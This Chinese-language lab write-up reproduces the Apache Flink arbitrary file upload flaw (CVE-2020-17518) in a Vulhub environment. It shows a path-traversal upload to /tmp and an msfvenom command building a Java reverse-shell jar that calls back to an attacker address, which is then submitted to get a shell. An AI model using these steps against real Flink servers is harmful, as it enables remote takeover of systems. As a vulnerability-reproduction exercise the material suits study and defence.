微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

Vulhub-4.Apache Flink任意文件上传漏洞(CVE-2020-17518)

Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式数据流引擎。

Apache Flink****任意文件上传漏洞(CVE-2020-17518)

Apache Flink 1.5.1引入了REST处理程序,由于功能上存在缺陷,攻击者可以通过修改HTTP HEADER将恶意文件写入到本地文件系统上的任意位置,并可通过Flink 访问。

影响范围:

Apache Flink 1.5.1-1.11.2

复现流程

上传文件进行抓包,更改上传路径,

image-20210913172801220

要看目录有没有上传成功,需要进行某些操作

docker ps查看进程id

image-20210913172442003

docker exec -it 6ddef1bcfa56 /bin/bash

cd /tmp别管有没有tmp文件夹,cd就对了

然后ls,查看有没有上传成功

image-20210913172709351

终于在../../../../../../tmp/succes上传成功

image-20210913172216621

此外,flink 本身是没有鉴权的,并且它本身支持任意jar包上传并执行,所以可以通过上传jar包getshell

生成java执行木马

msfvenom -p java/shell_reverse_tcp LHOST=192.168.106.138 LPORT=1234 -f jar -o a.jar

然后上传

设置并启用监听

image-20210913174336385

上传成功之后,点击submit运行

image-20210913174415819

获取shell了

image-20210913174455820

防御措施

更新版本

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。

相关推荐